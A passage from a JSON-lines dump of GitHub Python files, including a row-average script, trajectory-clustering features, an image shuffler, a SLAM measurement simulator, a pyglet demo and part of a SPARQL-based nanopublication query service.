response.url)","repo_name":"4nakata/YEMA-Coding-Challenge","sub_path":"yema/yema/spiders/YamaSpider.py","file_name":"YamaSpider.py","file_ext":"py","file_size_in_byte":10166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"71636132204","text":"import csv\n\nwith open('GDS5.txt') as csvfile:\n lines = csv.reader(csvfile, delimiter='\\t')\n\n for index, line in enumerate(lines):\n # remove as duas primeiras colunas\n del line[0:2]\n\n soma = 0\n for value in line:\n soma += float(value)\n \n media = soma/len(line)\n\n print( 'Media da linha {} é: {}'.format(index+1, media ) )\n","repo_name":"AnaHauachen/Bioinformatics","sub_path":"médialinhas.py","file_name":"médialinhas.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"5187850971","text":"import numpy as np\n\n\ndef curvature(xs, ys):\n \"\"\"\n Curvature for each point on a parametric curve.\n\n Curvature will be zero for a line and larger the more it deviates from a line.\n\n Parameters\n ----------\n xs : ndarray, shape (n_curves, n_pts)\n X coordinates.\n ys : ndarray, shape (n_curves, n_pts)\n Y coordinates.\n\n Returns\n -------\n k : ndarray, shape (n_curves, n_pts)\n Curvature for each point\n\n See Also\n --------\n https://www.khanacademy.org/math/multivariable-calculus/multivariable-derivatives/curvature\n \"\"\"\n x_prime = np.gradient(xs, axis=1, edge_order=2)\n y_prime = np.gradient(ys, axis=1, edge_order=2)\n xy_prime_mag = np.linalg.norm(np.dstack((x_prime, y_prime)), axis=2)\n\n Tx = x_prime / xy_prime_mag\n Ty = y_prime / xy_prime_mag\n\n Tx_prime = np.gradient(Tx, axis=1, edge_order=2)\n Ty_prime = np.gradient(Ty, axis=1, edge_order=2)\n Txy_prime_mag = np.linalg.norm(np.dstack((Tx_prime, Ty_prime)), axis=2)\n\n # curvature of each point of each curve\n k = Txy_prime_mag / xy_prime_mag\n\n return k\n\n\n#TODO: implement fps arguments\ndef velocity(lines, fps=None):\n \"\"\"\n Compute velocity between pairs of points. \n \n Parameters\n ----------\n lines : ndarray, shape (n_lines, n_pts, 2)\n Lines for which to compute the velocity.\n \n Returns\n -------\n v : ndarray, shape (n_lines, n_pts, 2)\n x and y components of velocity between each pair of points.\n \n References\n ----------\n http://mathworld.wolfram.com/VelocityVector.html\n \"\"\"\n x_prime = []\n y_prime = []\n for i in range(len(lines)):\n x_prime.append(np.gradient(lines[i, :, 0], edge_order=2))\n y_prime.append(np.gradient(lines[i, :, 1], edge_order=2))\n x_prime = np.array(x_prime)\n y_prime = np.array(y_prime)\n\n if fps is not None:\n pass\n\n return np.rollaxis(np.array((x_prime, y_prime)), axis=0, start=3)\n\n\ndef average_velocity(coords):\n \"\"\"\n Average velocity for points on a parametric curve.\n\n Helps seperate tracklets moving at varying pace.\n\n Parameters\n ----------\n\n Returns\n -------\n\n References\n ----------\n Anjum, Nadeem, and Andrea Cavallaro. \"Multifeature object trajectory clustering for video analysis.\" IEEE\n Transactions on Circuits and Systems for Video Technology 18.11 (2008): 1555-1564.\n \"\"\"\n n_pts = coords.shape[1]\n return (1/(n_pts-1)) * np.sum(coords[:, 1:, :] - coords[:, :-1, :], axis=1)\n\n\ndef directional_distance(coords):\n \"\"\"Directional distance between first and last points in tracklet.\n\n Encodes the direction of motion and helps distinguish longer tracklets from shorter ones\n and also tracklets in opposite directions.\n\n Parameters\n ----------\n coords\n\n Returns\n -------\n\n References\n ----------\n Anjum, Nadeem, and Andrea Cavallaro. \"Multifeature object trajectory clustering for video analysis.\" IEEE\n Transactions on Circuits and Systems for Video Technology 18.11 (2008): 1555-1564.\n \"\"\"\n return coords[:, -1, :] - coords[:, 0, :]\n\n\ndef trajectory_mean(coords):\n \"\"\"Trajectory mean.\n\n Helps distinguish tracklets belonging to different regions on the image plane.\n\n Parameters\n ----------\n coords\n\n Returns\n -------\n\n References\n ----------\n Anjum, Nadeem, and Andrea Cavallaro. \"Multifeature object trajectory clustering for video analysis.\" IEEE\n Transactions on Circuits and Systems for Video Technology 18.11 (2008): 1555-1564.\n \"\"\"\n n_pts = coords.shape[1]\n return (1/n_pts) * coords.sum(axis=1)\n\n\ndef directional_histogram(coords, n_bins):\n \"\"\"\n Trajectory directional histogram.\n\n Parameters\n ----------\n coords\n n_bins : int\n Number of bins. The interval [-pi,pi) will be divided into n_bins\n equal subintervals. The length of each subinterval is 2*pi/n_bins.\n\n Returns\n -------\n hist\n\n References\n ----------\n Anjum, Nadeem, and Andrea Cavallaro. \"Multifeature object trajectory clustering for video analysis.\" IEEE\n Transactions on Circuits and Systems for Video Technology 18.11 (2008): 1555-1564.\n\n \"A Coarse-to-Fine Strategy for Vehicle Motion Trajectory Clustering\", Li, Xi et al.\n \"\"\"\n x = coords[:, :, 0]\n y = coords[:, :, 1]\n\n dx = x[:, 1:] - x[:, :-1]\n dy = y[:, 1:] - y[:, :-1]\n\n # angles = np.arctan2(dy, dx) * 180 / np.pi\n # angles[angles<0] = angles[angles<0] + 360.0\n angles = np.arctan2(dy, dx)\n\n bins = np.linspace(-np.pi, np.pi, n_bins+1, endpoint=True)\n hist = np.apply_along_axis(lambda a: np.histogram(a, bins=bins)[0], 1, angles)\n # normalize\n total_pts = angles.shape[1]\n hist = hist / total_pts\n\n return hist, bins\n\n\n# def curvature2(xs, ys):\n# \"\"\"\n# Sum of curvatures for each point on a parametric curve.\n#\n# Curvature will be zero for a line and larger the more it deviates from a line.\n#\n# Parameters\n# ----------\n# xs : ndarray, shape (n_curves, n_pts)\n# X coordinates.\n# ys : ndarray, shape (n_curves, n_pts)\n# Y coordinates.\n#\n# Returns\n# -------\n# S : ndarray, shape (n_curves,)\n# Sum of curvature values for each point.\n#\n# See Also\n# --------\n# https://www.khanacademy.org/math/multivariable-calculus/multivariable-derivatives/curvature\n# \"\"\"\n# dx = np.gradient(xs)\n# ddx = np.gradient(dx)\n# dy = np.gradient(ys)\n# ddy = np.gradient(dy)\n#\n# num = dx * ddy - dy * ddx\n# denom = (dx * dx + dy * dy) ** (3 / 2)\n#\n# k = num / denom\n#\n# # sum curvatures of points for each curve\n# S = np.sum(k, axis=1)\n#\n# return S\n\n##################################################\n# Normalize feature spaces of each ROI separately\n##################################################\n# track_features_norm = {name: np.empty_like(track_features[name]) for name in track_features}\n# for name, arr in track_features.items():\n# for roi, track_inds in zip(roi_unq, roi_unq_tracks):\n# track_features_norm[name][track_inds] = preprocessing.scale(track_features[name][track_inds])\n\n\n##############################################################\n# Visualize feature space vs normed feature space for each ROI\n##############################################################\n# outfile = os.path.join(BASE_OUTPUT_DIR, 'trajectory_features_normalized.pdf')\n# print('Saving {} ...'.format(outfile))\n#\n# with tempfile.TemporaryDirectory() as tmpdir:\n# for roi, track_inds in zip(roi_unq, roi_unq_tracks):\n# # there is a problem with numpy arrays containing single elements so for now just duplicate the\n# # element to create an array of length 2 if a length 1 array is present\n# if len(track_inds) == 1:\n# track_inds = np.repeat(track_inds, 2)\n#\n# fname = os.path.splitext(os.path.basename(roi))[0]+'.pdf'\n# print('Saving {}'.format(fname))\n#\n# fig, axes = plt.subplots(nrows=2, ncols=len(track_features))\n# fig.suptitle(fname)\n#\n# # fill first row with features\n# for feat_idx, name in enumerate(sorted(track_features.keys())):\n# # save plot as image to file\n# # see http://stackoverflow.com/questions/37945495/python-matplotlib-save-as-tiff on how to save to memory rather than a file\n# g = sns.jointplot(track_features[name][track_inds, 0],\n# track_features[name][track_inds, 1],\n# kind='scatter', s=6, size=5)\n# g.set_axis_labels(feature_plot[name]['xlabel'], feature_plot[name]['ylabel'])\n# g.savefig(os.path.join(tmpdir, 'tmpimg.png'), bbox_inches='tight', pad_inches=0, dpi=300)\n# plt.close(g.fig)\n#\n# # read image from file and show in axes\n# img = misc.imread(os.path.join(tmpdir, 'tmpimg.png'))\n# axes[0, feat_idx].axis('off')\n# axes[0, feat_idx].imshow(img, aspect='equal', interpolation='none')\n# axes[0, feat_idx].set_title(feature_plot[name]['title'], fontsize=6)\n#\n# # fill second row with normalized features\n# for feat_idx, name in enumerate(sorted(track_features_norm.keys())):\n# # save plot as image to file\n# # see http://stackoverflow.com/questions/37945495/python-matplotlib-save-as-tiff on how to save to memory rather than a file\n# g = sns.jointplot(track_features_norm[name][track_inds, 0],\n# track_features_norm[name][track_inds, 1],\n# kind='scatter', s=6, size=5)\n# g.set_axis_labels(feature_plot[name]['xlabel'], feature_plot[name]['ylabel'])\n# g.savefig(os.path.join(tmpdir, 'tmpimg.png'), bbox_inches='tight', pad_inches=0, dpi=300)\n# plt.close(g.fig)\n#\n# # read image from file and show in axes\n# img = misc.imread(os.path.join(tmpdir, 'tmpimg.png'))\n# axes[1, feat_idx].axis('off')\n# axes[1, feat_idx].imshow(img, aspect='equal', interpolation='none')\n# axes[1, feat_idx].set_title('Normal '+feature_plot[name]['title'], fontsize=6)\n#\n# fig.savefig(os.path.join(tmpdir, fname))\n# plt.close(fig)\n#\n# # merge the pdf pages into a single pdf\n# pdfs = [os.path.join(tmpdir, f) for f in os.listdir(tmpdir) if f.endswith('.pdf')]\n# merger = PdfFileMerger()\n# for pdf in pdfs:\n# merger.append(FileIO(pdf, 'rb'))\n# merger.write(outfile)\n\n\n\n####################################################################################\n# Removing straight trajectories\n####################################################################################\n# compute curvature for each trajectory, removing any lines where curvature is nan/inifinite\n# mask = np.all(np.isfinite(curvature), axis=1)\n# curve = curve[mask]\n# roinames = roinames[mask]\n\n# threshold curvature to remove straight trajectories\n# mask = np.any(curve < curve_threshold, axis=1)\n# n_bad_tracks = len(np.flatnonzero(mask))\n# print('# of straight trajectories removed: {} ({:.2%})'.format(n_bad_tracks, n_bad_tracks/len(tracks)))\n# rois_uniq, unq_inv, unq_cnt = np.unique(tracks['video'], return_counts=True, return_inverse=True)\n# tr_indices = np.split(np.argsort(unq_inv), np.cumsum(unq_cnt[:-1]))\n#\n# # save pdf of all ROIs and the removed straight trajectories\n# labels = np.zeros(len(tracks), dtype=np.int)\n# labels[mask] = 1\n# for roiname, ind in zip(rois_uniq, tr_indices):\n# fname = os.path.splitext(os.path.basename(roiname))[0] + '.pdf'\n# print('Saving {}'.format(fname))\n# plot.trajectory_3d(tracks['coords'][ind], tracks['frame_num'][ind],\n# groups=labels[ind],\n# save_path=os.path.join(BASE_OUTPUT_DIR, fname))\n\n# trs = tracks[curve_mask]\n# labels = np.zeros(len(trs), np.int)\n# print('Saving pruned tracks (2d and 3d) ...')\n# plot.roi_track_clusters(os.path.join(BASE_OUTPUT_DIR, 'pruned_tracks_3d.pdf'),\n# trs['video'], trs['coords'], labels, '3d', trs['frame_num'], progress=True)\n# plot.roi_track_clusters(os.path.join(BASE_OUTPUT_DIR, 'pruned_tracks_2d.pdf'),\n# trs['video'], trs['coords'], labels, '2d', progress=True)\n\n\n","repo_name":"marximus/cilia-trajectory-cluster","sub_path":"tracklet/tracklet/features.py","file_name":"features.py","file_ext":"py","file_size_in_byte":11333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"20233298040","text":"import sys\nimport random\nfrom PIL import Image\n\ndef resize_to_even(im: Image) -> Image:\n '''画像の幅/高さが偶数になるようにcropする'''\n width, height = im.size\n\n if width % 2 == 1:\n width -= 1\n if height % 2 == 1:\n height -= 1\n \n resized = im.resize((width, height))\n return resized\n\ndef crop_image(im: Image) -> [Image]:\n '''画像を4分割する'''\n im = resize_to_even(im)\n\n width, height = im.size\n half_width = width // 2\n half_height = height // 2\n\n boxes = [\n (0, 0, half_width, half_height), # 左上\n (0, half_height, half_width, height), # 左下\n (half_width, half_height, width, height), # 右下\n (half_width, 0, width, half_height), # 右上\n ]\n\n cropped_imgs = []\n for box in boxes:\n cropped_img = im.crop(box)\n cropped_imgs.append(cropped_img)\n\n return cropped_imgs\n\ndef shuffle_and_concat(ims: [Image]) -> Image:\n '''4つの画像をシャッフルしたり180度反転したりして、\n 左上・左下・右下・右上の順に結合する\n '''\n width, height = ims[0].size\n width *= 2\n height *= 2\n dst = Image.new('RGB', (width, height))\n half_width, half_height = ims[0].size\n for box in [(0, 0), (0, half_height), (half_width, half_height), (half_width, 0)]:\n im = random.choice(ims)\n if random.random() < .5:\n im = im.transpose(Image.FLIP_LEFT_RIGHT)\n if random.random() < .5:\n im = im.transpose(Image.FLIP_TOP_BOTTOM)\n dst.paste(im, box)\n\n return dst\n\nif __name__ == '__main__':\n im = Image.open(sys.argv[1])\n ims = crop_image(im)\n out = shuffle_and_concat(ims)\n out.save('out.jpg')\n","repo_name":"utgwkk/yabaiwayo","sub_path":"yabaiwayo.py","file_name":"yabaiwayo.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"69929520045","text":"from utils.angle_utils import normalize_angle_pi_minus_pi\n\nimport numpy as np\n\nfrom collections import namedtuple, OrderedDict\nimport math\nimport random as rnd\nfrom typing import List\n\n\ndef add_measurement_to_pose(pose, measurement):\n \"\"\"\n Returns the position acquired by applying a [range, heading] measurement to a [x, y, heading] pose.\n :param pose: A pose in the form of [x, y, heading(rad)].\n :param measurement: A measurements in the form of [range, heading(rad)]\n :return: The resulting position as a (x, y) tuple.\n \"\"\"\n x = pose[0] + math.cos(measurement[1] + pose[2]) * measurement[0]\n y = pose[1] + math.sin(measurement[1] + pose[2]) * measurement[0]\n\n return float(x), float(y)\n\n\ndef calculate_landmark_distance(pose, landmark):\n return np.linalg.norm(landmark[:2] - pose[:2])\n\n\ndef calculate_landmark_heading(pose, landmark):\n x_landmark = landmark[0]\n y_landmark = landmark[1]\n x_state = pose[0]\n y_state = pose[1]\n\n phi = math.atan2(y_landmark - y_state, x_landmark - x_state)\n phi = phi - pose[2]\n phi = normalize_angle_pi_minus_pi(phi)\n\n return phi\n\n\nLandmarkDistanceIndex = namedtuple(\"LandmarkDistanceIndex\", \"landmark distance index\")\n\n\ndef get_landmarks_in_range(ground_truth_state, landmarks, max_sensing_range):\n landmark_distances = [np.linalg.norm(landmark[:2] - ground_truth_state[:2]) for landmark in landmarks]\n return [LandmarkDistanceIndex(landmark, landmark_distances[index], index) for index, landmark in\n enumerate(landmarks) if landmark_distances[index] <= max_sensing_range]\n\n\ndef calculate_measurement_vector_for_detection(ground_truth_state, landmark_distance_index):\n return np.array([[landmark_distance_index.distance,\n calculate_landmark_heading(ground_truth_state, landmark_distance_index.landmark),\n landmark_distance_index.landmark[2]]]).T\n\n\ndef add_noise_to_measurements_for_state(measurements_for_state, distance_deviation, heading_deviation):\n for measurement in measurements_for_state:\n measurement[0] = measurement[0] + rnd.normalvariate(0, distance_deviation)\n measurement[1] = measurement[1] + rnd.normalvariate(0, heading_deviation)\n measurement[1] = normalize_angle_pi_minus_pi(measurement[1])\n\n return measurements_for_state\n\n\ndef compress_correspondences(correspondences: List[List[int]]) -> List[List[int]]:\n \"\"\"\n Maps the given correspondence indices to a new set of indices, which start from zero (in order of appearance in the\n original correspondence lists), and are tightly increasing. NOTE: also modifies the input list!\n\n >>> compress_correspondences([[5, 8], [5, 9], [8, 9], [9, 5, 8]])\n [[0, 1], [0, 2], [1, 2], [2, 0, 1]]\n\n :param correspondences: list of correspondence lists for each state\n :return compressed correspondences\n \"\"\"\n flat_correspondences = [correspondence for correspondences_for_state in correspondences for correspondence in\n correspondences_for_state]\n\n original_correspondence_indices = list(OrderedDict.fromkeys(flat_correspondences))\n\n original_to_target = {original_correspondence_index: index for index, original_correspondence_index in\n enumerate(original_correspondence_indices)}\n\n for index, original_correspondences_for_state in enumerate(correspondences):\n correspondences[index] = [original_to_target[original_correspondence] for original_correspondence in\n original_correspondences_for_state]\n\n return correspondences\n\n\ndef generate_measurements(ground_truth_states, landmarks, max_sensing_range, sensing_range_deviation,\n distance_deviation, heading_deviation):\n \"\"\"\n Generates a list of measurements for every state in ground_truth_states. Measurements are numpy arrays of\n [r, phi, s].T, r being the distance to landmark, phi is heading (positive X direction is 0 rad, grows\n counter-clockwise), s is the landmark descriptor - an integer. Measurements contain additional zero-mean gaussian\n noise for the distance and heading, as specified by distance_deviation and heading_deviation.\n\n For each state, only landmarks within max_sensing_range are considered. From this group of landmarks, detections\n are sampled using the absolute values of random samples from a zero mean, sensing_range_deviation normal\n distribution as distance threshold.\n \"\"\"\n\n measurements = []\n correspondences = []\n\n for ground_truth_state in ground_truth_states:\n landmark_distance_index_list = get_landmarks_in_range(ground_truth_state, landmarks,\n max_sensing_range)\n\n # Sample obstacles from the in-range ones, using the absolute values of samples from a zero-mean normal\n # distribution as distance thresholds\n landmark_distance_index_list = [landmark_distance_index for landmark_distance_index in\n landmark_distance_index_list if\n abs(rnd.normalvariate(0, sensing_range_deviation))\n >= landmark_distance_index.distance]\n\n measurements_for_state = [\n calculate_measurement_vector_for_detection(ground_truth_state, landmark_distance_index) for\n landmark_distance_index in landmark_distance_index_list]\n correspondences_for_state = [landmark_distance_index.index for landmark_distance_index in\n landmark_distance_index_list]\n\n add_noise_to_measurements_for_state(measurements_for_state, distance_deviation, heading_deviation)\n\n assert len(measurements_for_state) == len(correspondences_for_state)\n\n measurements.append(measurements_for_state)\n correspondences.append(correspondences_for_state)\n\n compress_correspondences(correspondences)\n\n assert len(measurements) == len(correspondences)\n for index, correspondence_for_state in enumerate(correspondences):\n assert len(measurements[index]) == len(correspondence_for_state)\n\n return measurements, correspondences\n","repo_name":"Bazs/graph_slam","sub_path":"utils/measurement_model.py","file_name":"measurement_model.py","file_ext":"py","file_size_in_byte":6198,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"19"} +{"seq_id":"44290468304","text":"import pyglet\n\n# Global variables\nwindow = pyglet.window.Window(800, 600)\npyglet.gl.glClearColor(0,128,255,255)\nlabel = pyglet.text.Label(\"0\", font_size=36, y=300, x=400)\nraven_list = []\nfor i in range(25):\n strg = 'images/raven' + str(i + 1) + '.png'\n raven_list.append(pyglet.image.load(strg))\n# animation = pyglet.image.from_image_sequence(raven_list, 0.2, True)\nimage = pyglet.image.Animation.from_image_sequence(raven_list, 0.1, True)\nbatch = pyglet.graphics.Batch()\nsprite = pyglet.sprite.Sprite(img=image, batch=batch)\nsprite.scale = 0.5\n# Event callbacks\n@window.event\ndef on_draw():\n window.clear()\n label.draw()\n batch.draw()\n\n# Game loop (loop? Why loop?)\ndef game_loop(_):\n label.text = str(int(label.text) + 1)\n\npyglet.clock.schedule(game_loop)\npyglet.app.run()\n","repo_name":"kientuongnguyen/game","sub_path":"game/test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"1841407499","text":"import json\nimport urllib.request\n\nimport requests\nfrom app.config import settings\nfrom SPARQLWrapper import JSON, SPARQLWrapper\n\nKNOWLEDGE_PROVIDER = \"https://w3id.org/biolink/infores/knowledge-collaboratory\"\n\nget_nanopubs_select_query = (\n \"\"\"PREFIX rdf: \nPREFIX rdfs: \nPREFIX biolink: \nPREFIX np: \nPREFIX npx: \nPREFIX npa: \nSELECT DISTINCT ?association ?subject ?predicate ?object ?subject_category ?object_category\n ?primary_knowledge_source ?provided_by ?publications\n ?label ?description ?population_has_phenotype ?has_population_context\nWHERE {\n graph ?np_assertion {\n ?association\n biolink:aggregator_knowledge_source <\"\"\"\n + KNOWLEDGE_PROVIDER\n + \"\"\"> ;\n rdf:subject ?subject ;\n rdf:predicate ?predicate ;\n rdf:object ?object .\n OPTIONAL {\n ?association biolink:primary_knowledge_source ?primary_knowledge_source .\n }\n OPTIONAL {\n ?association biolink:provided_by ?provided_by .\n }\n OPTIONAL {\n ?association biolink:publications ?publications .\n }\n OPTIONAL {\n ?association rdfs:label ?label .\n }\n OPTIONAL {\n ?association biolink:description ?description .\n }\n OPTIONAL {\n ?association biolink:has_population_context|biolink:population_context_qualifier [\n rdfs:label ?has_population_context ;\n biolink:has_phenotype ?population_has_phenotype ;\n ] .\n }\n {\n ?subject a ?subject_category .\n ?object a ?object_category .\n } UNION {\n ?subject biolink:category ?subject_category .\n ?object biolink:category ?object_category .\n }\n }\n ?_entity_filters\n ?_prov_block\n ?_np_index_filter\n graph ?np_head {\n ?np_uri np:hasAssertion ?np_assertion ;\n np:hasProvenance ?np_prov .\n }\n graph npa:graph {\n ?np_uri npa:hasValidSignatureForPublicKey ?pubkey .\n }\n FILTER NOT EXISTS { ?creator npx:retracts ?np_uri }\n}\"\"\"\n)\n\nget_metakg_edges_query = (\n \"\"\"PREFIX rdf: \nPREFIX rdfs: \nPREFIX biolink: \nPREFIX np: \nPREFIX npx: \nSELECT DISTINCT ?subject_category ?predicate_category ?object_category\nWHERE {\n graph ?np_assertion {\n ?subject biolink:category ?subject_category .\n ?object biolink:category ?object_category .\n ?association\n biolink:aggregator_knowledge_source <\"\"\"\n + KNOWLEDGE_PROVIDER\n + \"\"\"> ;\n rdf:subject ?subject ;\n rdf:predicate ?predicate_category ;\n rdf:object ?object .\n FILTER (datatype(?subject_category) = xsd:string)\n FILTER (datatype(?object_category) = xsd:string)\n #{\n # ?subject a ?subject_category .\n # ?object a ?object_category .\n #} UNION {\n # ?subject biolink:category ?subject_category .\n # ?object biolink:category ?object_category .\n #}\n }\n graph ?np_head {\n ?np_uri np:hasAssertion ?np_assertion .\n }\n FILTER NOT EXISTS { ?creator npx:retracts ?np_uri }\n}\"\"\"\n)\n\nget_metakg_prefixes_query = (\n \"\"\"PREFIX rdf: \nPREFIX rdfs: \nPREFIX biolink: \nPREFIX np: \nPREFIX npx: \nSELECT DISTINCT ?node_category ?node_prefix\nWHERE {\n graph ?np_assertion {\n {\n ?association\n biolink:aggregator_knowledge_source <\"\"\"\n + KNOWLEDGE_PROVIDER\n + \"\"\"> ;\n rdf:subject ?node ;\n rdf:predicate ?predicate_category ;\n rdf:object ?object .\n } UNION {\n ?association\n biolink:aggregator_knowledge_source <\"\"\"\n + KNOWLEDGE_PROVIDER\n + \"\"\"> ;\n rdf:subject ?subject ;\n rdf:predicate ?predicate_category ;\n rdf:object ?node .\n }\n ?node biolink:category ?node_category .\n FILTER (datatype(?node_category) = xsd:string)\n\n VALUES (?namespace ?separator) {\n (\"//identifiers.org/\" \"/\")\n (\"//purl.obolibrary.org/obo/\" \"_\")\n (\"//www.ebi.ac.uk/efo/\" \"_\")\n }\n BIND(UCASE(STRBEFORE(REPLACE(STRAFTER(str(?node), \":\"), ?namespace, \"\"), ?separator)) AS ?node_prefix)\n FILTER(strlen(?node_prefix)>0)\n FILTER(!strstarts(?node_prefix, \"//\"))\n }\n graph ?np_head {\n ?np_uri np:hasAssertion ?np_assertion .\n }\n FILTER NOT EXISTS { ?creator npx:retracts ?np_uri }\n}\n\"\"\"\n)\n\n# Load BioLink JSON-LD Context to resolve URIs to BioLink CURIEs\nwith urllib.request.urlopen(\n f\"https://raw.githubusercontent.com/biolink/biolink-model/v{settings.BIOLINK_VERSION}/context.jsonld\"\n) as url:\n data = json.loads(url.read().decode())\n\n\nnamespace_resolver = {}\ncontext = data[\"@context\"]\nfor prefix in context:\n if isinstance(context[prefix], str):\n namespace_resolver[prefix] = context[prefix]\n elif \"@id\" in context[prefix]:\n namespace_resolver[prefix] = context[prefix][\"@id\"]\n\nuri_resolver = {v: k for k, v in namespace_resolver.items()}\nuri_resolver[\"https://identifiers.org/mim/\"] = \"OMIM\"\nuri_resolver[\"https://identifiers.org/OMIM:\"] = \"OMIM\"\nuri_resolver[\"https://identifiers.org/drugbank/\"] = \"DRUGBANK\"\nuri_resolver[\"https://go.drugbank.com/drugs/\"] = \"DRUGBANK\"\nuri_resolver[\"https://w3id.org/biolink/vocab/\"] = \"biolink\"\nuri_resolver[\"http://w3id.org/biolink/vocab/\"] = \"biolink\"\nuri_resolver[\"https://w3id.org/um/neurodkg/\"] = \"neurodkg\"\n# http://www.ebi.ac.uk/efo/EFO_000985\n\n\ndef resolve_uri_with_context(uri_string):\n \"\"\"Take an URI and return its CURIE form, using the BioLink JSON-LD Context previously loaded\"\"\"\n for ns_uri in uri_resolver:\n if uri_string.startswith(\"http://purl.obolibrary.org/obo/\"):\n # Handle OBO URIs\n return uri_string.replace(\"http://purl.obolibrary.org/obo/\", \"\").replace(\n \"_\", \":\"\n )\n elif uri_string.startswith(ns_uri):\n return uri_string.replace(ns_uri, uri_resolver[ns_uri] + \":\")\n elif uri_string.startswith(\"https://identifiers.org/\"):\n # To handle URIs generated by Nanobench templates\n return uri_string.replace(\"https://identifiers.org/\", \"\")\n # If not found:\n return uri_string\n\n\ndef resolve_curie(curie_string):\n \"\"\"Take a CURIE and return the corresponding URI in the Nanopublication network\n using the BioLink JSON-LD Context previously loaded\n \"\"\"\n # Quick fix to handle lowercase drugbank and omim\n # if curie_string.startswith('drugbank:'):\n # curie_string = curie_string.replace('drugbank:', 'DRUGBANK:')\n # if curie_string.startswith('omim:'):\n # curie_string = curie_string.replace('omim:', 'OMIM:')\n\n ns = curie_string.split(\":\")[0]\n id = curie_string.split(\":\")[1]\n if ns in namespace_resolver:\n return namespace_resolver[ns] + id\n else:\n return \"http://identifiers.org/\" + curie_string\n\n\ndef resolve_curie_identifiersorg(curie_string):\n \"\"\"Take a CURIE and return the corresponding URI in the Nanopublication network\"\"\"\n # Quick fix to handle lowercase drugbank and omim\n if curie_string.startswith(\"drugbank:\"):\n curie_string = curie_string.replace(\"drugbank:\", \"DRUGBANK:\")\n if curie_string.startswith(\"omim:\"):\n curie_string = curie_string.replace(\"omim:\", \"OMIM:\")\n return \"https://identifiers.org/\" + curie_string\n\n\ndef get_predicates_from_nanopubs():\n \"\"\"Query the Nanopublications network to get BioLink entity categories and the relation between them\n Formatted for the Translator TRAPI /predicate get call\n \"\"\"\n # TODO: Update to the meta_knowledge_graph for TRAPI 3.1.0\n predicates = {}\n # Run query to get types and relations between them\n sparql = SPARQLWrapper(settings.NANOPUB_SPARQL_URL)\n sparql.setReturnFormat(JSON)\n sparql.setQuery(get_metakg_edges_query)\n sparqlwrapper_results = sparql.query().convert()\n sparql_results = sparqlwrapper_results[\"results\"][\"bindings\"]\n for result in sparql_results:\n np_subject = resolve_uri_with_context(result[\"subject_category\"][\"value\"])\n np_predicate = resolve_uri_with_context(result[\"predicate_category\"][\"value\"])\n np_object = resolve_uri_with_context(result[\"object_category\"][\"value\"])\n if not predicates.get(np_subject):\n predicates[np_subject] = {}\n\n if not predicates[np_subject].get(np_object):\n predicates[np_subject][np_object] = []\n if np_predicate not in predicates[np_subject][np_object]:\n predicates[np_subject][np_object].append(np_predicate)\n\n return predicates\n\n\ndef get_metakg_from_nanopubs():\n \"\"\"Query the Nanopublications network to get BioLink entity categories and the relation between them\n Formatted for the Translator TRAPI /predicate get call\n \"\"\"\n # TODO: Update to the meta_knowledge_graph for TRAPI 3.1.0\n # Run query to get types and relations between them\n sparql = SPARQLWrapper(settings.NANOPUB_SPARQL_URL)\n sparql.setReturnFormat(JSON)\n sparql.setQuery(get_metakg_edges_query)\n sparqlwrapper_results = sparql.query().convert()\n sparql_results = sparqlwrapper_results[\"results\"][\"bindings\"]\n # print(get_metakg_edges_query)\n # print(sparql_results)\n edges_array = []\n for result in sparql_results:\n edges_array.append(\n {\n \"subject\": resolve_uri_with_context(\n result[\"subject_category\"][\"value\"]\n ),\n \"predicate\": resolve_uri_with_context(\n result[\"predicate_category\"][\"value\"]\n ),\n \"object\": resolve_uri_with_context(result[\"object_category\"][\"value\"]),\n }\n )\n\n # print(get_metakg_prefixes_query)\n sparql.setQuery(get_metakg_prefixes_query)\n sparqlwrapper_results = sparql.query().convert()\n prefixes_results = sparqlwrapper_results[\"results\"][\"bindings\"]\n nodes_obj = {}\n for result in prefixes_results:\n node_category = resolve_uri_with_context(result[\"node_category\"][\"value\"])\n if node_category not in nodes_obj.keys():\n nodes_obj[node_category] = {\"id_prefixes\": [result[\"node_prefix\"][\"value\"]]}\n else:\n nodes_obj[node_category][\"id_prefixes\"].append(\n result[\"node_prefix\"][\"value\"]\n )\n\n return {\"edges\": edges_array, \"nodes\": nodes_obj}\n\n\ndef get_np_users():\n pubkeys = {}\n headers = {\"Accept\": \"application/json\"}\n res = requests.get(\n f\"{settings.NANOPUB_GRLC_URL}/get_all_users\", headers=headers\n ).json()\n for user in res[\"results\"][\"bindings\"]:\n # print(user)\n # Remove bad ORCID URLs\n if not user[\"user\"][\"value\"].startswith(\"https://orcid.org/https://orcid.org/\"):\n if \"name\" not in user:\n user[\"name\"] = {\"value\": user[\"user\"][\"value\"]}\n\n pubkeys[user[\"pubkey\"][\"value\"]] = user\n # users_orcid[user['user']['value']] = user\n return pubkeys\n\n\ndef reasonerapi_to_sparql(reasoner_query):\n \"\"\"Convert an array of predictions objects to ReasonerAPI format\n Run the get_predict to get the QueryGraph edges and nodes\n {disease: OMIM:1567, drug: DRUGBANK:DB0001, score: 0.9}\n\n :param: reasoner_query Query from Reasoner API\n :return: Results as ReasonerAPI object\n \"\"\"\n np_users = get_np_users()\n # print(np_users)\n query_graph = reasoner_query[\"message\"][\"query_graph\"]\n query_options = {}\n n_results = None\n in_index = None\n if \"query_options\" in reasoner_query:\n query_options = reasoner_query[\"query_options\"]\n if \"n_results\" in query_options:\n n_results = int(query_options[\"n_results\"])\n if \"in_index\" in query_options:\n in_index = str(query_options[\"in_index\"])\n\n if len(query_graph[\"edges\"]) != 1:\n return {\n \"error\": len(query_graph[\"edges\"])\n + \"\"\" edges have been provided.\n This API currently only implements 1 hop queries (with 1 edge query_graph).\n Contact us if you are interested in running multiple hop queries\"\"\"\n }\n\n sparql_query_get_nanopubs = get_nanopubs_select_query\n predicate_edge_id = \"\"\n subject_node_id = \"\"\n object_node_id 